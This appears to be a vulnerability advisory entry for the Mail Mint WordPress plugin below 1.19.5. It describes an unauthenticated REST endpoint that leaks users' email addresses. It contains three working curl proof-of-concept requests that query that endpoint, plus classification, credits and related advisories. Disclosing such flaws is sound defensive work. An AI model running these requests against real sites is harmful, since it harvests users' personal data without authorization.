Mail Mint < 1.19.5 – Unauthenticated Emails Disclosure | CVE 2026-2025 | Plugin Vulnerabilities

Description

The plugin does not have authorization in one of its REST API endpoint, allowing unauthenticated users to call it and retrieve the email addresses of users on the blog

Proof of Concept

```
curl -s "http://example.com/wp-json/mrm/v1/wp/admins?term=@"
curl -s "http://example.com/wp-json/mrm/v1/wp/admins?term=.com"
curl -s "http://example.com/wp-json/mrm/v1/wp/admins?term=gmail"
```

Affects Plugins

Fixed in 1.19.5

References

CVE

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CVSS

Miscellaneous

Original Researcher

yiğit ibrahim sağlam

Submitter

yiğit ibrahim sağlam

Submitter website

https://ibrahimsql.com

Submitter twitter

Verified

Yes

WPVDB ID

1b815cde-cd9d-46fa-a6ab-3d2851705e7b

Timeline

Publicly Published

2026-02-11 (about 1 month ago)

Added

2026-02-11 (about 1 month ago)

Last Updated

2026-02-11 (about 1 month ago)

Other

Published

Title

Published

2024-07-12

Title

Zephyr Project Manager < 3.3.100 - Unauthenticated Information Exposure

Published

2023-10-03

Title

WP Ultimate Exporter < 2.4.2 - Unauthenticated Information Disclosure

Published

2021-09-22

Title

Ninja Forms < 3.5.8 - Unprotected REST-API to Sensitive Information Disclosure

Published

2024-04-05

Title

ConvertKit < 2.4.6 - Unauthenticated Sensitive Information Exposure

Published

2025-07-16

Title

JetMenu < 2.4.11.2 - Authenticated (Subscriber+) Information Exposure